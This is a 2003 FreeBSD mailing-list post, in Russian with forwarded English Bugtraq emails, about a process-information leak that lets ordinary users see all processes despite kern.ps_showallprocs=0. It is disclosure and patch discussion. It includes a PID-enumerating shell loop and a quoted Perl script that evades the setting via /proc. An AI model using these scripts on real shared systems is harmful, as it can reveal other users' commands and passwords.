[UC-FreeBSD] FreeBSD и невозможность просмотра информации о чужих процессах

Lokhin lokhin на UnixCenter.ru
Ср Янв 8 11:21:00 MSK 2003


Каждый админ когда-либо задумывался о том, как бы запретить пользователям просматривать 
чужую таблицу ппроцессов.

Читайте...

----------  Пересланное письмо  ----------

Subject: ps information leak in FreeBSD
Date: 5 Январь 2003 23:46
From: "Cache" <cache на sowatech.com.pl>
To: bugtraq на securityfocus.net

Nothing special, lame :)

Hi,

0x01 About
0x02 Practical
0x03 Conclusion
0x04 Install
0x05 End
0x06 Greetz


0x01 About:

Autor: Rafael Lesniak / 05012003 Hannover / cache на irc.pl
Sorry for My English

This is a little information leak. This bug(?) is not dangerous, but
normal user can see all process on the box using ex. /bin/ps;

Affected Systems:
FreeBSD		:possible all
OpenBSD		:don't known
Linux		:don't known
Other		:don't known

0x02 Practical:

(I don't use /proc.)

Last login: Sun Jan  5 00:13:01 on ttyv0
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
    The Regents of the University of California.  All rights reserved.

FreeBSD 4.7-RELEASE (SILENT) #1: Sun Jan  5 00:10:51 GMT 2003

Welcome to FreeBSD!


[cache на silent][ttyv1] ~> grep "FreeBSD:" /usr/src/sys/i386/conf/LINT
# $FreeBSD: src/sys/i386/conf/LINT,v 1.749.2.124 2002/10/05 18:31:47 scottl
Exp

[cache на silent][ttyv1] ~> sysctl -a | grep show
kern.ps_showallprocs: 0
[cache на silent][ttyv1] ~> ps -auxwwwp 101
USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
root   101  0,0  0,2  1020  740  ??  Is    0:12     0:00,01 /usr/sbin/cron

ps [-aCcefhjlmrSTuvwx] [-M core] [-N system] [-O fmt] [-o fmt] [-p pid]
    [-t tty] [-U username]

-p      Display information associated with the specified process ID.

--- cut ---

0x03 Conclusion:

I hope it is good idea to protect all process information
(any way, for what We need kern.ps_showallprocs?)

[cache на silent][ttyv1] ~> cat info.sh
#!/bin/sh
pid=0;
while x=0; do
/bin/ps -auxwwwp $pid | /usr/bin/grep $pid;
pid=`expr $pid + 1`;
done

--- cut ---

See out.log how it works.

0x04 Install:

$ mkdir /tmp/patch
$ cp proc-patch.tar.gz /tmp/patch
$ cd /tmp/patch
$ tar -zxvf proc-patch.tar.gz
$ su
# patch -p0 < proc.patch

--- cut ---
Hmm...  Looks like a new-style context diff to me...
The text leading up to this was:
--------------------------

|*** /usr/src/sys/kern/kern_proc.c      Tue May  1 13:39:06 2001
|--- /usr/src/sys/kern/kern_proc.c      Sun Jan  5 00:18:40 2003

--------------------------
Patching file /usr/src/sys/kern/kern_proc.c using Plan A...
Hunk #1 succeeded at 453.
done
--- cut ---

configure Your kernel, compile, install and thats all.

0x05 End:

I have make this little patch for My FreeBSD box, and this method
doesn't work. May be it is possible to do, but this is not My
skill level );] ...

0x06 Greetz:
    kador, Lam3rz, layon, ultor, neutrinka, !pl-bsd, and
	all lamerz ...


## Rafal (cache) Lesniak   #######
CoSysOp cache /at/ sowatech.com.pl
### http://www.sowatech.com.pl ###

-------------------------------------------------------


----------  Пересланное письмо  ----------

Subject: Re: ps information leak in FreeBSD
Date: 7 Январь 2003 00:19
From: Sean Kelly <smkelly на zombie.org>
To: Cache <cache на sowatech.com.pl>, security-officer на FreeBSD.org

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> [cache на silent][ttyv1] ~> sysctl -a | grep show
> kern.ps showallprocs: 0
> [cache на silent][ttyv1] ~> ps -auxwwwp 101
> USER   PID %CPU %MEM   VSZ  RSS  TT  STAT STARTED      TIME COMMAND
> root   101  0,0  0,2  1020  740  ??  Is    0:12     0:00,01 /usr/sbin/cron

I've been aware of this problem for a long time, and in fact I made a patch
against 4.6-STABLE which can be applied to correct it. I am not sure how
portable it will be to 4.7-STABLE, but I imagine it would work.

Please see the relevent FreeBSD PR:
http://www.FreeBSD.org/cgi/query-pr.cgi?pr=kern/42065

--
Sean Kelly         | PGP KeyID: D2E5E296
smkelly на zombie.org | http://www.zombie.org

-------------------------------------------------------


----------  Пересланное письмо  ----------

Subject: Re: ps information leak in FreeBSD
Date: 7 Январь 2003 12:18
From: Jez Hancock <jez.hancock на munk.nu>
To: bugtraq на securityfocus.com

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;

This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc.  The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill.  its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER]      [GROUP]     [PID]   [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
 if(${proc}=~/[0-9]/o){
  unshift(@pids, ${proc});
 }
}
foreach $pid (@pids){
 open(FD, "ls -al /proc/$pid/file|");
 while(<FD>){
  chomp;
  ${l}=$_;
  ${l}=~s/\s{1,}/ /g;
  if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
   &ppid(${1},${2},${pid},${3});
  }
 }
 close(FD);
}
exit(0);

sub ppid(){
 (${a},${b},${c},${d})=@_;
 undef(${str});
 undef(${line});
 if(-e "/proc/$c/cmdline"){
  open(heh,"cat /proc/$c/cmdline|");
  @hah=<heh>;
  @chars=split(//, на hah[0]);
  foreach ${chr} (@chars){
   if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
    ${str}.=" ";
   }else{
    ${str}.=${chr};
   }
  }
  ${line}.=${a};
  while(length(${line})<11){${line}.=" ";} #alignment...
  ${line}.=" ".${b};
  while(length(${line})<23){${line}.=" ";}
  ${line}.=" ".${c};
  while(length(${line})<31){${line}.=" ";}
  chop(${str});
  if(${d}eq"unknown"){
   ${str}=~s/\s{1,}//g;
   ${line}.=" ("."${str}".")";
  }else{
   ${line}.=" "."${str}";
  }
  @line=split(//,${line});
  if(length(${line})>80){
   ${cntr}=0;
   foreach ${char} (@line){
    if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
     print "\n"." "x32;          #^Anything >, deal with the rollover.
    }
    print "${char}";
    ${cntr}++;
   }
   print "\n";
  }
  else{
   print "${line}\n";
  }
  return(0);
 }
}

I believe someone (last poster in this thread?) also posted a patch on the
 same list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p
 options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings
 when ps is run by other users.  Ho hum...

Regards,

Jez Hancock

-------------------------------------------------------

-- 
Alexey Lokhin
PGP key ID 0x792e24c9



Подробная информация о списке рассылки FreeBSD